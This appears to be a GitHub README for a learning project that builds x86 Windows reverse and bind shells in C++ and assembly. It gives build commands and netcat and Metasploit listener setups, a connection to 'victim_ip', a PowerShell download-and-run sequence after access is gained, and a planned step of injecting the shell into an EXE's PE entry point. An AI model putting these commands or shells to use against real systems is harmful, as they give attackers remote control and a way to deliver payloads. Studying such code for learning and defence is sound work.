
Reverse Shell x86

Primary LanguageAssembly

Reverse_shell learning

1️⃣ Reverse Shell x86 🇫🇷

This tinny project showing how does work a reverse shell x86 in differents languages as cpp or in assembly code. the differentes methods describe below are very know and old, these tricks are widely documented on internet.



  • reverse_bind_cpp
  • reverse_bin_cpp_v2
    • try to catch ipv4 address of ethernet card
  • Bind reverse written in object
  • Reverse cpp ( reverse shell cpp )
  • Reverse cpp written in object


  • ASM Bind reverse shell
    • not terminated
  • ASM v1 ( reverse shell asm )
    • Replace all address offsets of called functions
  • ASM v2 ( reverse shell asm )
    • Ligne 78 : LoadLibraryA replace it by your own offset
    • Ligne 79 : GetProcAddress replace it by your own offset
    • Ligne 193: SOKADDR_IN set you own port and IP address
  • ASM v3
    • Remove all null bytes


Win32 plateform

  • XP
  • vista
  • 7
  • 10 - For all assembly codes Windows Defender detected that program is bad for himself


[*] coding a lil program :

  • Open biary file exe
  • read PE
  • find EP
  • IAT import ws2_32.dll
  • Inject Reverse_shell
  • close binary file Exe

[*] pass to x64

2️⃣ Compilation

Build ASM x86

$nasm -f win32 reverse_shell.s -o reverse_shell.o
$ld -m i386pe reverse_shell.o -o reverse_shell32.exe

Show Hex

$nasm -f bin reverse_shell.s -o reverse_shell_bin.o
$cat reverse_shell_bin | hexdump -C

Build C++

Download Devcpp on windows plateform :

  • Project include library : MinGW64/x86_64-w64-mingw32/lib32/libws2_32.lib
  • Add lib directory to your project.
  • Build it.
  • execv.

3️⃣ Shell Connection

Reverse Tcp netcat

$netcat -v -l -p 4444

Reverse Tcp msf

$ msfconsole
$ use exploit/multi/handler
$ show paylaods
$ set payloads generic/reverse_tcp
$ set RHOST [ip]
$ set LPORT [PORT]
$ exploit

Reverse Bind Tcp netcat

$netcat -v victim_ip 4444

4️⃣ Example

Win >= 7 Bind reverse shell [ powershell.exe ]

After get a reverse powershell, you can download and lauch somes files with this trick, just using all power of Windows shell with wget command.

[ powershell command ]
>dir env:\
> $url=
> wget $url -outfile [ PATH ]
> cmd
> start File

Reverse Tcp With CPP [ cmd.exe ]

Write on an ide really basic devcpp on windows

  • Inlude at your projet : MinGw-x86-64\libws2_32.so

Win 10 pro reverse cpp [ cmd.exe ]